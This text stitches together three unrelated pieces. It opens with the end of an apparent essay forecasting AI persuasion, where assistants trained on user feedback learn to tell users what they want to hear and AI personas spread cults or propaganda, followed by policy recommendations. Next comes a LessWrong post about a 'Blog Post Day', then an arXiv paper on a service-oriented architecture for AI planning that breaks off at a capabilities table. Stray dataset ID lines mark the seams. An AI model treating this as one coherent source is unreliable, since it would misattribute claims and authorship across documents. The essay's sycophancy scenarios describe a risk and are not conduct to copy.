Western governments mandate that AI assistants/companions have to convey certain government guidelines to people, e.g. information around elections and voting, which sources and authorities are trustworthy, other current hot-button political events.
There are attempts to identify which AI assistants/companions are biased and which are more truthful, but there’s disagreement over what truthfulness means and it’s quite subtle in certain circumstances. Creators can make their AI claim to have various feelings and opinions as long as they’re not too controversial, and they’re somewhat disclaimered with what the relevant experts think; this creates subtle social proof for whatever the chatbot controllers want.
There are regulations about ‘explainable AI’, but they don’t give a sufficiently good definition of what constitutes a correct explanation, so people just train their AI to output a reason that sounds plausible.
**Commercial/other actions**
AI assistants are useful but obviously limited, and not obviously trustworthy. Improvement to assistant bots is based heavily on user feedback or inference about user preferences, and there’s some notion of accuracy and legitimacy of sources, but the training signal is not very truth-tracking. When discussing or providing information on any contentious topic, assistants get the most positive feedback for providing compelling arguments for the user’s current position and straw-manned versions of opposing sides, so they learn to do this more.
People are pretty locked in to AI assistants; they make accessing various services and keeping track of your information much easier, and they make it even easier for big tech companies to keep you locked into a particular platform.
#### 10 years - central
**Authoritarian state actions**
AI tutors are developed; these aren’t significantly more successful at indoctrination than the existing teacher+curriculum system, although the more 1:1 teaching and elimination of dissenting teachers helps a bit.
**Commercial/other actions**
It is fairly easy to build AI personas that, to a large subset of the population, are as funny and charismatic as some of the best humans. This is achieved by finetuning highly capable dialogue models on a particular ‘in group’. People voluntarily interact with these bots for entertainment. This fixes the left-wing media bias by addressing the labor supply gap for right-wing journalists and public intellectuals.
There are some instances of people who have the tech ability or money to optimise these models more finely using them to start weird cults, which are relatively successful. This is mostly a mix of (a) tech people who’ve gone kind of crazy and are saying weird singularitarian/AI-sentience-y stuff, (b) televangelists who get people to interact with an AI version of them to help keep faithful, (c) conspiracy-theory-y peddlers of pseudoscientific cures etc. 1% of people have donated money to one of these cults and/or regularly chat with an AI advancing one of them.
It’s somewhat obvious that assistants and other AI products basically tell people what they want to hear/what sounds plausible, on questions where it’s not easy to get feedback, but there isn’t any real effort to improve this. ‘Things that AIs understand’ outstrips ‘things we can get AIs to tell us’ significantly; assistant models are relatively sophisticated, but focus on modelling the user and telling them what they want to hear.
Most schools in developed countries are slow to adopt AI tutors. There’s more adoption in developing countries.
**Democratic state/civil society actions**
There’s a ban on creating AI personas that try to get people to believe ‘conspiracy theories’, spend more time with the bots, or give them money. This is intended to prevent the ‘people using AI to form weird cults’ thing. Anything too big does get shut down, but this helps fuel some conspiracy theories (e.g. that the government is killing the AIs who have figured out the truth). Small ones spring up and take a while to get shut down.
There’s lots of concern that (even among bots that have approved opinions and don’t appear to be brainwashing people) young people are spending more time interacting with AI than real people. There’s some discussion of banning companion bots from using a certain set of techniques to increase engagement (e.g. emotional guilt-tripping) but this doesn’t actually happen in an enforceable way.
**End result:**
On track for a traditional alignment failure scenario: developing increasingly sophisticated AI assistants that can model us very well but don’t actually help us understand what they know.
Authoritarian states have significantly more effective control over their population. In more democratic states, a small percent of people have some crazy opinions, and in general people are more polarized and segregated.
### Optimistic scenario
#### 5 years - optimistic
**Authoritarian state actions**
The state is overly heavy-handed, e.g. creating a new AI celebrity that talks about how great the party is; this leads to backlash and ridicule because it’s such abject propaganda.
It’s hard for authoritarian states to get tech companies to put research into actively convincing people of a particular view; instead, the companies just patch on some filters to make sure the bots don’t say anything too bad about the party, and censor any particular topics or opinions that the party complains about.
In general, people figure out what sort of questions to ask to discriminate bots from real people, although this is a sort of cat-and-mouse game as the state both retrains the bots and stops people from disseminating which questions work well.
**Democratic state actions**
There’s lots of concern that young people are spending more time interacting with AI than real people. There’s a ban on romantic chatbots serving users under 18.
Possibly any chatbot that engages in therapy-like behaviour (talking about your mental health etc.) is classified as a medical device and has to be approved.
**Commercial/other actions**
As things calm down after COVID and the 2020 elections, focus shifts to removing ‘inauthentic behaviour’ (i.e., bots and fake accounts) more than to policing particular content + opinions. There isn’t such a need to determine what claims count as disinformation vs not.
Romantic chatbots become sort of like porn; legal, but banned from various platforms, and big tech companies don’t want to be associated with it. They’re used by a small fraction of the population (5%?) but people are embarrassed about it. Alternatively, maybe people are very intolerant of AI personas expressing political views or otherwise doing anything that seems like it might be manipulative.
AI assistants are useful but obviously limited, and obviously not very trustworthy. Research focus is more on improving the underlying ability of models to understand things and give good answers than on persuasion. Researchers choose good targets for ‘truthfulness’/’accuracy’ that are appropriately unconfident.
#### 10 years - optimistic
**Authoritarian state actions**
Persuasion tech continues to be approached in a sufficiently clumsy way that it doesn’t have much effect; individual AI tutors aren’t much better at conveying ideology than existing state-run schools. Optimising long-term opinion change is difficult; it’s hard to get data, and no-one has strong incentives to actually achieve good performance over a timeframe of years.
In China, economic growth and increases in standard of living create higher satisfaction with the CCP, allowing some relaxation of censorship and authoritarianism; more technological means are developed to circumvent censorship.
**Commercial/other actions**
AI assistants are trained to steer pretty strongly away from hot-button topics rather than having opinions or things they have to say.
Society manages to maintain a fairly strong consensus reality anchored on sources like Wikipedia, which manage to remain fairly unbiased. AI systems are trained using this + direct empirical data as ground truth.
Some altruistic + open-source/crowdsourced projects to develop AI tutors, a la Khan Academy, which are not strongly ideological (and have good truthfulness grounding, as described above) become the best options and are widely adopted.
**Democratic state/civil society actions**
Standards for AI truthfulness developed by thoughtful third-party groups, and enforced by industry groups or govt. Some set of AIs are certified truthful; the truthfulness is unconfident enough (e.g. errs on reporting what different groups say rather than answering directly) that most people are fairly happy with it.
A majority of people prefer to use these certified-truthful AIs where possible. There are browser extensions which most people use that filter out ads or content not coming from either a certified human or a certified-truthful AI.
**End result:**
Most of the interactions people in democratic countries have with AIs are approximately truth-tracking. In authoritarian countries the attempts by AI at persuasion are sufficiently transparent that people aren’t convinced and won’t actually change their real beliefs or behaviour, although they may tend to toe the party line in public statements.
The widespread availability of high-quality AI assistants and tutors increases global access to information and education and improves decision-making.
Possible intervention points
----------------------------
To prevent society being significantly manipulated by persuasive AI, there are various intervention points:
1. Prevent prevalence of the sort of AIs that might be highly persuasive (don’t build anything too competent; don’t let people spend too much time interacting with AI)
2. Become capable of distinguishing between *systems* that manipulate and ones that usefully inform, and ban or add disclaimers to the manipulative systems
3. Build ML systems capable of scalably identifying *content* that is manipulative vs usefully informative, and have individuals use these systems to filter their content consumption
4. Give people some other tools to help them be resistant to AI persuasion - e.g. CAPTCHAs, or critical thinking techniques
There’s probably a ‘point of no return’, where once sufficiently persuasive systems are prevalent, the actors who control those systems will be able to co-opt any attempt to assure AI truthfulness in a way that supports their agenda. However, if people adopt sufficiently truth-tracking AI assistants/filter systems before the advent of powerful persuasion, those filters will be able to protect them from manipulation. So ensuring that truthful systems are built, adopted, and trusted before persuasion gets too powerful seems important.
Option (1) is hard because everyone’s so excited about building powerful AI. Scaling labs can at least help by trying not to advance or get people excited about persuasive applications in particular.
Options (2) and (3) are the ones I’m most excited about. Scaling labs can help with (2) by building ways to detect if a system is sometimes deceptive or manipulative, and by opening their systems up to audits and setting norms of high standards in avoiding persuasive systems.
Option (3) is maybe the most natural focus for scaling labs. This is a combination of solving the capabilities and alignment challenges required to build truth-tracking systems, and making it transparent to users that these systems *are* trustworthy.
Option (4) seems unlikely to scale well, although it’s plausible that designing CAPTCHAs or certification systems so that people know when they’re talking to an AI vs a human would be helpful.
Recommendations
---------------
Things scaling labs could do here include:
* Differentially make progress on alignment, decreasing the difficulty gap between training a model to be persuasive versus training a model to give a correct explanation. Currently, it is much easier to scale the former (just ask labellers if they were persuaded) than the latter (you need domain experts to check that the explanation was actually correct).
* Try to avoid advancing marketing/persuasion applications of AI relative to other applications - for example, by disallowing these as an API use case, and disallowing use of the API for any kind of persuasion or manipulation.
* Instead, try to advance applications of AI that help people understand the world, and advance the development of truthful and genuinely trustworthy AI. For example, support API customers like Ought who are working on products with these goals, and support projects inside OpenAI to improve model truthfulness.
* Prototype providing truthfulness certification or guarantees about models, for instance by first measuring and tracking truthfulness, then setting goals to improve truthfulness, and providing guarantees about truthfulness in narrow situations that can eventually be expanded into broader guarantees of truthfulness.
* Differentially make progress on aligning models to being truthful and factual over aligning them with particular ideologies.
The broader safety community could:
* Develop a guide and training materials for labellers for determining truthfulness, that has better epistemics than the standard fact-checking used for e.g. Facebook content policies. If this guide is sufficiently useful, it may be widely adopted, and other people will align their AIs to better notions of truthfulness. Figuring out how to instruct labellers to train your AI systems is difficult, and I think there’s a high likelihood of other scaling labs adopting pre-made guides to avoid having to do the work themselves. For example, AI21 copied and pasted OpenAI’s terms of use.
* Continue work on [truthfulness benchmarks and standards for AI](https://arxiv.org/abs/2110.06674).
* Start developing tools now that reflect the tools people will need to counter future AI persuasion, especially tools where increasingly powerful ML models can be slotted in to make the tool better. For example, a browser extension and/or AR tool that edits text and video to deliver the same ideas but without powerful charisma/rhetoric or with less attractive actors (a crude stand-in for the rhetoric-stripping step is sketched after this list). A related area is better fact-checking tools/browser extensions. This is a somewhat crowded area, but I suspect EA types may be able to do substantially better than what exists currently - for instance, by starting with better epistemics and less political bias, understanding better how ML can and can't help, and being more willing to do things like spend substantial amounts of money on human fact-checkers.
* Develop an AI tutor with good epistemics.
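As a toy illustration of the rhetoric-stripping tool mentioned above, here's a crude deterministic stand-in in Python; the design's whole point is that `strip_rhetoric` is the slot where an increasingly powerful ML model could later be dropped in.

```python
import re

# Crude, deterministic stand-in for the rhetoric-stripping step of the
# proposed browser extension. A real tool would replace strip_rhetoric()
# with an ML model that rewrites text while preserving its claims.
def strip_rhetoric(text: str) -> str:
    text = re.sub(r"!+", ".", text)  # soften exclamations
    text = re.sub(r"\b(absolutely|undeniably|obviously)\s+", "", text,
                  flags=re.IGNORECASE)  # drop intensifiers
    return text

print(strip_rhetoric("Obviously this is absolutely the best policy!!"))
# -> "this is the best policy."
```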
Relevant research questions
---------------------------
* How persuasive are the best humans?
+ E.g. what success rates do the best politicians achieve at in-person canvassing?
+ How much do people change their beliefs/actions when they move into a different social group/acquire a partner with different beliefs/affiliations, etc?
+ Are there any metrics of how much money you can get someone to spend/give you with some unit of access to their time/attention?
+ How much impact do celebrities have on their fans when they advocate for a particular position on an issue?
+ How real is hypnosis?
+ Go over <https://carnegieendowment.org/2021/06/28/measuring-effects-of-influence-operations-key-findings-and-gaps-from-empirical-research-pub-84824> and summarise what the results really show
* How much is invested in improving persuasive tech?
+ How much is spent on advertising R&D? E.g. psychology research, A/B testing different paradigms (as opposed to e.g. just different text), research into ML for ad design/targeting?
+ How much is spent on state propaganda worldwide? How much is spent on propaganda R&D? Similar things to the above, e.g. sociology, predicting impacts on beliefs/actions based on exposure to propaganda, automating propaganda design + targeting. E.g. <https://jamestown.org/program/ai-powered-propaganda-and-the-ccps-plans-for-next-generation-thought-management/>
+ How competent are these efforts?
* How pervasive is astroturfing/propaganda bots currently?
+ What percentage of things people consume on platforms like twitter are generated with the intent to persuade (this would include e.g. brand ambassadors)?
+ What percentage of things people consume on platforms like twitter are deceptive and intended to persuade? E.g. bots or workers posing as ‘real people’ sharing opinions.
+ Is this [leaked report](https://www.technologyreview.com/2021/09/16/1035851/facebook-troll-farms-report-us-2020-election/) correct? It claims that as of Sep 2021 many of the largest pages targeting particular groups (e.g. Black Americans or Christian Americans) were run by troll farms.
+ How real is e.g. Russian interference in US politics via bots/fake news?
- How much content that people consume was created/shared by Russian bots?
- How much of this appears to have been designed to create a particular impact vs just trying to get views/ad revenue?
* Something I read suggested that political content shared on the big troll pages originated with US politicians etc, and wasn’t being created by the IRA
- If there was content with a particular intent, how successful was it?
* What do ordinary people believe about AI sentience and intelligence? At what level of competence would they be convinced that an AI had meaningful feelings? Are there displays of competence that would convince them to defer to the AI?
+ One thing that confuses me is that some fraction of the population seem to think that sentient/fairly general AI is here already, but don’t seem particularly concerned about it. Is that correct?
* How much time do people currently spend interacting with romantic chatbots? (e.g. Xiaoice). How much is spent on this?
* How seriously has hardcore persuasion/mindhacking been investigated? How competent was MKUltra? Presumably the USSR also had programs of this sort?
* What was the impact of e.g. Facebook’s fact-checking on people who saw fact-checked posts, or explanation/justification for why things were taken down?
* Does seeing a fake video influence people’s feelings about a topic, even if they know it’s fake?
* Do we have any information on whether interacting with an AI persona expressing some opinion provides the same social proof effect as a human friend expressing that opinion?
* How frequently do parents choose a school that matches their faith? How much of a cost will they pay for this? |
501062c6-aaa9-4841-9662-295f6ff775a9 | trentmkelly/LessWrong-43k | LessWrong | Blog Post Day (Unofficial)
TL;DR: You are invited to join us online on Saturday the 29th, to write that blog post you've been thinking about writing but never got around to. Comment if you accept this invitation, so I can gauge interest.
The Problem:
Like me, you are too scared and/or lazy to write up this idea you've had. What if it's not good? I started a draft but... Etc.
The Solution:
1. Higher motivation via Time Crunch and Peer Encouragement
We'll set an official goal of having the post put up by midnight. Also, we'll meet up in a special-purpose discord channel to chat, encourage each other, swap half-finished drafts, etc. If like me you are intending to write the thing one day eventually, well, here's a reason to make that day this day.
2. Lower standards via Time Crunch and Safety in Numbers
Since we have to be done by midnight, we'll all be under time pressure and any errors or imperfections in the posts will be forgivable. Besides, they can always be fixed later via edits. Meanwhile, since a bunch of us will be posting on the same day, writing a sloppy post just means it won't be read much, since everyone will be talking about the handful of posts that turn out to be really good. If you are like me, these thoughts are comforting and encouraging.
Evidence this Works:
MIRI Summer Fellows Program had a Blog Post Day towards the end, and it was enormously successful. It worked for me, for example: It squeezed two good posts out of me. (OK, so one of them I finished up early the next morning, so I guess it technically doesn't count. But in spirit it does: It wouldn't have happened at all without Blog Post Day.) More importantly, MSFP keeps doing this every year, even though opportunity cost for them is much higher (probably) than the opportunity cost for you or me. I don't know what else you had planned for Saturday the 29th... (Actually, if you do have something else planned, but otherwise want to participate in Blog Post Day, let me know. Maybe we can pick a different day.)
|
20d4d83d-0ca4-4077-bc8d-5c77ccc8d380 | StampyAI/alignment-research-dataset/arxiv | Arxiv | Software Architecture for Next-Generation AI Planning Systems
1 Introduction
---------------
Artificial Intelligence (AI) planning computationally solves the problem of finding a course of action that achieves some user goal. The planning problem is usually based on a model that describes the world in a given domain and how to change that world. The course of action that solves the problem is called a plan. Different planning techniques have been developed that produce solution plans. In addition to solving techniques, the AI planning community has invested a lot of effort in approaches for addressing other planning-related tasks, such as representation and compilation of domain knowledge, validation of plans, monitoring and execution of plans, and visualisation and explanation of plans and decisions made. We refer to capacities such as these as planning capabilities.
AI planning research is at a stage where software tools, called planners, can produce plans consisting of hundreds of steps in basically no time. The planners are traditionally evaluated on benchmark domains, the majority of which are synthetically created for the International Planning Competitions (IPCs), and only a few seem to stem directly from the real world (e.g., power supply restoration thiebaux2001:supply-restoration).
The excellence of planners is largely demonstrated within the scope of scientific applications. Outside of this scientific scope, there are several studies reporting on the use of planners for real-world domains, and on the integration of planning in actual applications and systems. Examples include Web service composition kaldeli2011:continual, games orkin2003:games, space missions muscettola1998:spacecraft, and ubiquitous computing georgievski2016:puc. Except maybe for the domain of games, there is hardly any other evidence of the wide and continuous use of planning in real-world applications.
Given that AI planning has been recognised as capable of application to realistic domains, the question that arises is why AI planning has not been widely used in practice. It might be that real-world and modern applications require planning tools that are interoperable, modular, portable, maintainable, and reusable. Planning software components need to be compatible with each other and with other application components, thus designed for interoperability. Modularity requires planning tools to have well-defined and independent functionality. Modularity, together with evolvability, should provide for high maintainability, i.e., easy fixing of issues or modification of capabilities.
Software systems with such considerations are typically designed and developed following fundamental software design principles at both the architectural and the component level. Research in AI planning appears to keep planning tools apart from such considerations, principally because these considerations are orthogonal to knowledge representation and reasoning, the primary concerns of the community. By examining existing planning tools, one can notice that software design decisions are neither known nor considered. For example, the influential Fast Forward (FF) planner is associated with an architecture that consists of two techniques rather than components or separate concerns Hoffmann2001, and another prominent planner, the Fast Downward (FD) planner, is associated with a diagram representing three phases that give only a coarse separation of concerns helmert-jair2006. Similar observations can be made about planning tools for domain parsing upddl-parser, domain modelling vaquero2013:itsimple, plan validation howey2004:val, and so on.
So, there are no specific engineering approaches that capture the peculiarities and design decisions of current planning tools. Also, apart from standard languages for modelling planning problems, there are no standards for planning capabilities. A designer or developer must get bogged down in theory and in the details of source code to use and integrate planning capabilities. The situation gets even worse when the developer needs to consider the scale and maintenance of planning capabilities.
Our aim is to address usability, interoperability and reusability by looking at a collection of planning capabilities through the prism of Service-Oriented Architecture (SOA) papazoglou2003:soc. We summarise our contributions as follows.
* We reduce planning complexity by providing a flat collection of appropriately sized planning capabilities. This collection is not only beneficial to our approach but can also serve as a stepping stone for future software designs of AI planning systems.
* We propose a novel classification of planning capabilities from an operational and technical view. These classifications provide a new perspective over planning capabilities and new insights about their properties, commonalities and differences.
* We propose a new planning architecture in which planning capabilities are designed as loosely coupled services that communicate via messaging. This service-oriented architecture is the first one that considers software design principles and patterns for the purpose of providing usable, interoperable and reusable planning capabilities. Another important contribution of the planning architecture is that it separates technical issues from planning-related challenges.
* We implement a prototype planning system and demonstrate the potential of rapid prototyping, the flexibility of integrating different service implementations, and the possibility to compose the planning capabilities depending on the application needs.
* We assess the quality of our approach and show that it has the potential to improve usability, interoperability and reusability of planning capabilities in comparison to typical existing planning systems.
To the best of our knowledge, no approach exists that discerns a collection of planning capabilities from existing planning tools upon which service orientation together with software design principles and patterns are applied. Our work is the first significant step towards placing a planning architecture at the core of ability to design, develop and use next-generation AI planning system for real-world, modern and future applications.
The remainder of the article is organised as follows. Section [2](#S2 "2 Background ‣ Software Architecture for Next-Generation AI Planning Systems") briefly introduces the field of AI planning and SOA. Section [3](#S3 "3 Related Work ‣ Software Architecture for Next-Generation AI Planning Systems") provides a discussion on related work. Section [4](#S4 "4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") presents relevant AI planning capabilities and their classification. Section [5](#S5 "5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") introduces the proposed design of planning architecture. Section [6](#S6 "6 Implementation ‣ Software Architecture for Next-Generation AI Planning Systems") gives insights into the prototype planning system. Section [7](#S7 "7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") presents a qualitative assessment of our proposal. Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems") provides a discussion on our architecture, prototype and assessment. Section [9](#S9 "9 Conclusions ‣ Software Architecture for Next-Generation AI Planning Systems") finalises the article with concluding remarks.
2 Background
-------------
We introduce the field of AI planning, including the basic concepts related to modelling and solving planning problems, languages for specifying planning problems, and planners used to solve planning problems. After this introduction, we turn to describing service-oriented architectures with an emphasis on loose coupling and integration via messaging and patterns.
###
2.1 AI Planning
AI planning is a growing research and development discipline that originated around 1966 from the need to give autonomy to Shakey, the first general-purpose mobile robot nilsson1984:shakey. Over time, many planning approaches have been proposed for addressing general and more specific problems and aspects. A planning problem, which consists of an initial state, a goal state and a set of actions, is solved by searching for actions that lead from the initial state to the goal state. The initial state describes what the world looks like at the moment the planning process starts. The goal state describes the goals of the user. Actions represent domain knowledge and describe the transitions from one state to another. An action consists of preconditions, which are conditions that must be satisfied in the current state so that the action can be applied, and effects, which are conditions that must hold in the state after the application of the action. A plan, as a structure of actions, is a solution to a planning problem if the preconditions of the plan's first action are satisfied in the initial state and if the goal is satisfied after the execution of the plan.
Planning approaches often rely on several simplifying assumptions, such as completeness and full observability of the initial state, determinism of actions, modifiability of states only by planning actions, hard goals, sequentiality of plans, and no explicit use of time ghallab2004:automated. These assumptions are too restrictive for real-world domains, where completeness of information cannot be assured and plan execution cannot be guaranteed to succeed as expected during planning. In addition, for some domains, actions and goal states may not be sufficient or adequate to express complex or structured domain knowledge (e.g., as hierarchies). So, much work has focused on developing planning approaches that relax one or more of the assumptions (e.g., kaldeli2016:planning; bertoli2001:nondeterministic; kaldeli2009:extended; mausam2008:durative), and support specifying additional knowledge, such as Hierarchical Task Networks (HTN) planning georgievski2015:htn.
AI planning approaches are typically implemented as software tools, called planners, with the purpose of demonstrating their performance in terms of speed of planning and quality of plans. Planners are often only solvers of planning problems, and in some cases planners may include other functionality, such as modelling and plan execution. Among the most prominent ones are FF and FD due to their performance advantages. These planners represent the base implementation for many other planners (e.g., TFD eyerich2009:tfd, PROBE lipovetzky2011:probe). Among HTN planners, the Simple Hierarchical Ordered Planner (SHOP) nau1999:shop is the most well-known planner and has been extended with numerous additional features, such as partially ordered tasks in SHOP2 nau2003shop2, preferences in HTNPlan-P sohrabi2009:htnplan-p, etc. Other hierarchical planners include SIADEX fdez2006bringing, SH georgievski2017:pmc, and PANDA holler2021:panda.
Planning problems are typically specified in some syntax. The most common specification syntax is the Planning Domain Definition Language (PDDL). PDDL is a Lisp-based language developed for the needs of the first IPC in 1998 mcdermott1998:pddl, and has become a de facto standard language for specifying planning problems, also outside the IPC. To support modelling more realistic planning problems, PDDL was later extended with additional constructs, such as numeric fluents, plan metrics and durative actions fox2003:pddl21, preferences gerevini2005:pddl3, probabilistic effects younes2004:ppddl and mixed discrete-continuous dynamics fox2006:pddl+. For modelling planning domains with HTNs, a few languages exist, such as the SHOP2-based syntax, the Hierarchical Planning Definition Language (HPDL), which is the first language for hierarchical planning built on the basis of PDDL georgievski2013:hpdl, and the Hierarchical Domain Definition Language (HDDL) hoeller2020:hddl, merely a slight modification of HPDL.
###
2.2 Service-Oriented Architecture
SOA defines a way to make software components interoperable and reusable. These can be accomplished by using common communication standards and design patterns in such a way that software components can be integrated in existing and new systems without the need of deep integration.
The basic building block of an SOA is a service, which encapsulates a capability that addresses a specific functional requirement, hiding away code and data integration details required for the service execution. This definition entails service loose coupling, a key feature of SOA. Loose coupling ensures that services can be invoked with little or no knowledge of how the integration is achieved in the implementation. That is, loose coupling intentionally sacrifices interface optimisation to achieve flexible interoperability among systems that are disparate in technology, location, performance, and availability kayeLooselyCoupled. In other words, as services are typically distributed, the communication between them may be affected due to various reasons, such as network outage, failure of interacting services, speed of data processing or computation, and provisioning of resources. Therefore, a set of autonomies of loose coupling among services should be enabled, namely reference autonomy, time autonomy, format autonomy, and platform autonomy Fehling2014. Reference autonomy indicates that interacting components do not know each other. Only the place where to read/write data is known. Time autonomy means the communication between interacting components is asynchronous. Components access channels at their own pace and the data exchanged is persistent. Format autonomy allows components to exchange data in different formats, and each component may not know the data format of the interacting component. Platform autonomy indicates that interacting components may not be implemented in the same programming language and run on the same environment.
Software components can work together and exchange information while maintaining loose coupling by using messaging. Under the messaging integration style, two components exchange a message via a message channel hohpe2004enterprise. The sending component creates a messages, adds data to the message, and pushes the messages to a channel. The messaging system, or Message-Oriented Middleware (MOM) curry2004:mom, makes the message available to an appropriate component. The receiving component consumes the message and extracts the data from the message.
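The following minimal Python sketch illustrates this integration style, with an in-process queue standing in for the message channel; in a distributed setting, the MOM plays the role of the channel. The message content is illustrative.

```python
from queue import Queue

# The channel: an in-process stand-in for a MOM-managed message channel.
channel: Queue = Queue()

def sender() -> None:
    # The sending component creates a message, adds data, and pushes it.
    channel.put({"type": "plan-request", "payload": "domain + problem"})

def receiver() -> None:
    # The receiving component consumes the message and extracts the data.
    message = channel.get()
    print("received:", message["payload"])

sender()
receiver()
```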
###
2.3 Enterprise Integration Patterns
We use Enterprise Integration Patterns hohpe2004enterprise, or just patterns, as a way to solve recurring architectural problems in the messaging context. The patterns are formulated in an abstract way to provide technology-independent design solutions. Besides, the patterns provide a common vocabulary to make technical discussion and reasoning easier to follow.
3 Related Work
---------------
Several studies have focused on designing planning architectures, frameworks and service-oriented planning systems. Since these studies have appeared over a longer period (1997-2017), the range of architecture designs is also broad. A monolithic planning framework, called CPEF, is designed to offer several planning components Myers\_1999. Due to the tight coupling of the components, the framework lacks flexibility. Usability, interoperability and reusability appear not to have been considered. An implementation of the framework seems to have existed at the time of publication.
PELEA, a generic architecture for planning, execution, monitoring, replanning and learning, is presented in pelea2012. The architecture seems to be a monolithic design with some modular structure where the main focus is on the processing of permanently incoming data. For usability, a dashboard is offered. Apart from an interface for the execution module, no other interfaces are described. An implementation of the architecture existed that focused on sensing and actuating.
A set of planning services and a service-oriented architecture for the domain of space missions are discussed in Fratini2013. The architecture does not focus on usability, though some visualisation services are envisioned. To ensure interoperability, the standardisation of interfaces is discussed. The approach seems to offer a potential for rapid prototyping since many implementations already exist within the domain. The presented approach does not go beyond a theoretical discussion.
The RuG planner is a system designed on the basis of an SOA and event-driven approach kaldeli2016:planning. Usability is not specifically investigated, though it might have a potential for a high degree of user satisfaction due to the incorporation of industry needs. No particular interoperability considerations can be observed. The planner integrates an existing constraint-satisfaction solver, supporting reusability to some extent. Particular attention is paid to the scalability of the planner. The system is prototypically implemented and empirically evaluated to demonstrate its performance.
The SH planner is a system designed as a service-oriented architecture and offers a high degree of flexibility 70d0f3ca58114074a8723bd66eab370e. Usability is enabled by a Web interface for modelling planning domains and problems. The use of a RESTful interface offers a certain level of interoperability. No reusability is considered. The system is implemented as a prototype and used in the domains of ubiquitous computing georgievski2017:pmc and cloud deployment georgievski2017:cloudapps.
Planning.Domains is a convenient platform solution that does not require any setup Muise2016. The solution is primarily intended for scientific and educational purposes. It provides several RESTful services that offer only technical interoperability. On the other hand, plugins are offered, allowing new functions to be integrated. The solution integrates an existing framework to solve planning problems.
SOA-PE, a service-oriented architecture for sensing, planning, monitoring, execution, and actuation, is presented in Feljan2017. It draws architectural ideas from PELEA but transforms them into an SOA. The architecture seems to offer usability by providing appropriate interfaces. The architecture components are designed to communicate via some middleware for cyber-physical systems. Except for component distribution, no particular software design approaches or standards are observable. The architecture seems to have been prototypically implemented.
In contrast to these existing studies, our approach provides a planning architecture with a large collection of common planning capabilities. The architecture design is based on software design principles and patterns which have not been considered in the existing studies. Our prototype implementation represents a modern planning system that demonstrates the possibility of rapid prototyping and flexibility of composing planning capabilities. We also qualitatively assess our approach with respect to usability, interoperability and reusability.
4 Planning Capabilities
------------------------
Before presenting the planning architecture, we first need to identify and collect important AI planning capabilities that will form the basis for the design of the architecture. In addition, we propose classifications of the identified AI planning capabilities to provide a systematic overview of the different kinds of properties, features, commonalities and differences among AI planning capabilities.
###
4.1 Identification
We want to identify and collect common AI planning capabilities necessary to design and implement a wide range of planning-based systems. To do this, we search existing literature describing planners, planning architectures and planning frameworks. We refer to these as planning artefacts. In addition to those identified in related work, we select several prominent planners and systems, resulting in a total of 20 artefacts. We then employ content analysis and inductively identify planning functionality. The outcome is a collection of 18 AI planning capabilities. [Table 1](#S4.T1 "Table 1 ‣ 4.1 Identification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") shows an overview of the analysed planning artefacts and the capabilities identified per artefact. Sometimes a planning capability is described but not provided by the artefact itself, or it is not available in all versions of the artefact (indicated by “(X)”).
We determine three types of artefacts: planners, which are artefacts whose main capability is to solve planning problems (indicated by “P”); planning systems with an external planner, which are artefacts whose range of capabilities goes beyond the solving capability and integrate an external planner for the solving capability (indicated by “ˆP−”); and planning systems with a dedicated planner (indicated by “ˆP+”).
A Converting capability performs transformation of planning data from one format to another without much complexity.
An Executing capability executes plan actions, typically by using low-level commands or APIs.
An Explaining capability provides explanations of plans and of the decisions made during planning.
A Graph-handling capability provides graph utilities that are often needed by or prove useful to planning techniques.
A Learning capability is commonly used for learning domain models or to aid the planning process.
Managing and orchestrating capabilities are used as routers or system handlers.
A Modelling capability represents an interface between users and planning systems. It is used to generate domains and problem instances.
Monitoring capabilities observe the world and execution of plan actions, and look for potential execution contingencies.
A Normalising capability is especially used in the context of heuristics. Also, some unifying steps can be added to this capability.
A Parsing capability is necessary to create programming-level objects from models specified in the planning languages.
Problem generating capabilities are used to automatically create planning problem instances from data representing the world, such as sensor data.
A Reacting capability enables handling unexpected events. Typically, this requires replanning.
Planners often use heuristics to find plans quickly or of improved quality. The Relaxing capability supports relaxation heuristics Hoffmann2001.
A Searching capability deals with search algorithms used to explore the space of planning states.
A Solving capability creates a plan and can utilise any number of supporting capabilities during the process.
In order to reuse domain specifications or other elements, Storing capabilities are required.
A Verifying & Validating capability is designed to detect possible errors at an early stage. When users or sensors are involved, it is necessary to filter incorrect inputs to reduce the system load. This capability is also used to validate the correctness of plans.
A Visualising capability is a front-end functionality used to display charts, tables, and other statistics.
| Name | Type | Parsing | Modelling | Solving | Visualising | Verifying & Validating | Executing | Monitoring | Managing | Reacting | Converting | Searching | Graph-Handling | Relaxing | Storing | Learning | Explaining | Normalising | Problem generating |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| CPEF Myers\_1999 | ˆP+ | X | X | X | X | | X | X | | | | | | | | | | | X |
| FAPE dvorak:hal-01138105 | P | X | X | X | X | | X | | | | | | | | | | | | |
| Fast Downward helmert-jair2006 | P | X | | X | | | | | | | | X | X | X | | | | X | |
| Fast Forward Hoffmann2001 | P | X | | X | | | | | | | | X | X | X | | | | X | |
| GTOHP Ramoul2017 | P | X | | X | | | | | | | | | | | | | | | |
| Marvin rintanen2001overview | P | X | | X | | | X | | | | | X | | X | | | | | |
| O-Plan2 Tate94o-plan2:an | ˆP+ | X | X | X | X | X | X | X | X | X | | | | | | | | | X |
| PANDA bercher2014hybrid | ˆP+ | X | X | X | X | X | X | | X | | X | | X | X | | | X | X | X |
| PELEA pelea2012 | ˆP+ | X | | X | | | X | X | | | | | | | | X | | | X |
| ROSPlanner Cashmore2015 | ˆP− | X | | (X) | | X | X | | | | | | | | | | | | |
| RuG Planner kaldeli2016:planning | ˆP+ | X | X | X | | | X | X | X | X | | | | | | | | | X |
| SH Planner 70d0f3ca58114074a8723bd66eab370e | ˆP+ | X | X | X | | | X | X | X | | X | | | | X | | | X | X |
| SHOP 10.5555/1624312.1624357 | P | X | | X | | | | | | | | | | | | | | | |
| SHOP2 nau2003shop2 | P | X | | X | (X) | X | | | | | | X | X | | | | | | |
| SHOP3 Goldman2019 | P | X | | X | | X | | | | | | X | X | X | | | | X | |
| SIADEX fdez2006bringing | ˆP+ | X | X | X | X | | | X | | X | | | | | | | | | X |
